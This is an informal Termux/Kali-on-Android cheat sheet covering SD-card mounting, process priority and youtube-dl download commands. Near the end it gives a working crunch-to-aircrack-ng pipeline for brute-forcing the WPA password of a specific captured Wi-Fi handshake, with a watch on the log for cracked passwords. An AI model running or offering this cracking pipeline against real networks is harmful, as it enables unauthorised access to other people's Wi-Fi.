TERMUX / LiNuX @ android 7+ / youtube-dl // DoWnLoAD
Before starting DOWNLOADING it is easy & nice to mount the “SD-CARD” in KALi.
top -H // (Shows you the actual “Taskmanager” running Processes with “N”ice value. // Worx ONLY in TERMUX but shows also Processes from KALi)
nice -n -20 ./start-kali.sh // (HIGH Priority for Processor!) // Works on KALi too. Start Process with nice but remember 100% CPU!
Before starting DOWNLOADING it is easy & nice to mount the “SD-CARD” in KALi.
1.) You have to install a Editor in TERMUX for example: NANO or VIM, etc.
^^ command: “pkg install nano”
2.) Open the “Start-File” in TERMUX in your new installed EDITOR (nano).
^^ command: “nano start-kali.sh”
3.) Search following two Lines in Editor NANO, VIM… :
## uncomment the following line to mount /sdcard directly to /
#command+=” -b /sdcard”
4.) Edit the “#command” Line. Therefore just delete/erase the “#” Symbol in first row to load the Command everytime you starting KALi. U can also save it both with other Name to get switch between Load SD-Card & not load SD-Card.
5.) Exit & SAVE File changes – then TEST start of Kali with SD-CARD – Folder:
^^ Command for TEST/RUN: “./start-kali.sh” — after start: “cd /” (root Computer) — change to SD-Card Folder: “cd /sdcard/MYownTERMUXfolderNAME/…YOUR FILES…
^^copy to there save it there (scripts may download right into SD-CARD Folder – nice for BIG Files (like movies / much Music…)
USE: “ls -ls” or “ls” to LiSt Directory !
youtube-dl (use it in KALi@Termux, write ur own script!, Save it to SDCARD (enough space free!?)
★.mp3 Audio Save incl. Convertation from Video to Audiofile *.MP3 (Best Audio Quality = 0 / worst = 10 / default = 5 ! )
########## ##
youtube-dl -v –print-traffic –newline –console-title –prefer-free-formats –prefer-insecure –restrict-filenames -x –audio-quality 0 –audio-format mp3 -a /sdcard/T3rMuX/URL_yt-DList.URL
*.mkv VIDEO
youtube-dl -v –print-traffic –prefer-insecure –newline –console-title –prefer-free-formats –restrict-filenames -a /sdcard/T3rMuX/URL_yt-DList.URL
^^ — BEACHTE: /sdcard/ORDNERNAME/URL.url // Du kannst frei entscheiden wo die Datei mit den URLs zum Downloaden ist UND wie die Datei heißen soll.
## uncomment the following line to mount /sdcard directly to /
#command+=” -b /sdcard”
## crunch 8 8 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 -t @@@@@@99
The @ characters will change while the 99 remains constant.
nice -n -20 crunch 8 8 9876543210 -t @@@@@@@@|aircrack-ng -l ~/PWhsCRK-EB79.log -a2 /sdcard/T3rMuX/crk/EB791750-D4-60-E3-68-41-44.cap -b D4-60-E3-68-41-44 -w-
### so it uses 100%cpu better try without nice!
## the -t @@… can be removed. its good4continuing.
USE tail in Termux:Float to show asop the saved Password File if they created (PW found/cracked… ;-)– :
tail -F ~/PWhsCRK-EB79.log
by Die Muchte
linux download